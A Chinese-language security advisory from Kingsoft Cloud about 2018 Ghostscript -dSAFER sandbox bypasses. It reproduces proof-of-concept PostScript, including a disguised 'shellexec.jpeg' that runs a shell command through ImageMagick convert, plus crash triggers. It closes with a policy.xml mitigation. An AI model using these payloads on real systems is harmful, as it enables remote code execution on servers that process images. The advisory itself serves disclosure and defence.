Ghostscript存在多个漏洞,可导致远程代码执行
2018年8月22日,金山云安全应急响应中心监控到外界安全研究员Tavis Ormandy公布了与Ghostscript漏洞有关的细节信息,这些漏洞若被利用,可导致远程代码执行。
漏洞编号
还未分配漏洞编号
漏洞名称
Ghostscript 远程代码执行
漏洞危害等级
高危
漏洞描述
攻击者可利用恶意PostScript、PDF、EPS或XPS文件触发漏洞,以下为漏洞简介:
1./invalidaccess 恢复失败后会结束,可控制错误处理部分
$ *gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null*GS>*legal*GS>*{ null restore } stopped { pop } if*GS>*legal*GS>*mark /OutputFile (%pipe%id) currentdevice putdeviceprops*GS<1>*showpage*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
2.setcolor可通过setpattern间接调用且未进行检查
$ *gs -q -sDEVICE=ppmraw -dSAFER*GS>*<< /Whatever 16#414141414141 >> setpattern*Segmentation fault
3.LockDistillerParams布尔值未进行类型检查
$ *gs -q -sDEVICE=ppmraw -dSAFER*GS>*<< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams*Segmentation fault
4. .tempfile权限管理未生效
Ubuntu:
$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undefsave
legal
{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
CentOS:
$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undeflegal
{ null restore } stopped { pop } iflegal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
影响版本
截止目前,Artifex Software,ImageMagick,Redhat,Ubuntu已经说明会受到此漏洞影响,CoreOS宣布不受影响。
修复方案
1. 目前官方还未发布补丁,请关注补丁更新信息并进行修复工作。
2. CERT/CC发布安全通告,对此漏洞进行预警,其中漏洞描述为“-dSAFER沙箱绕过漏洞”,给出的临时解决方案是在ImageMagick policy.xml中禁用PostScript、EPS、PDF以及XPS解码器。
<policy domain =“coder”rights =“none”pattern =“PS”/> <policy domain =“coder”rights =“none”pattern =“EPS”/> <policy domain =“coder”rights =“none” pattern =“PDF”/> <policy domain =“coder”rights =“none”pattern =“XPS”/>
北京金山云网络技术有限公司
2018/08/22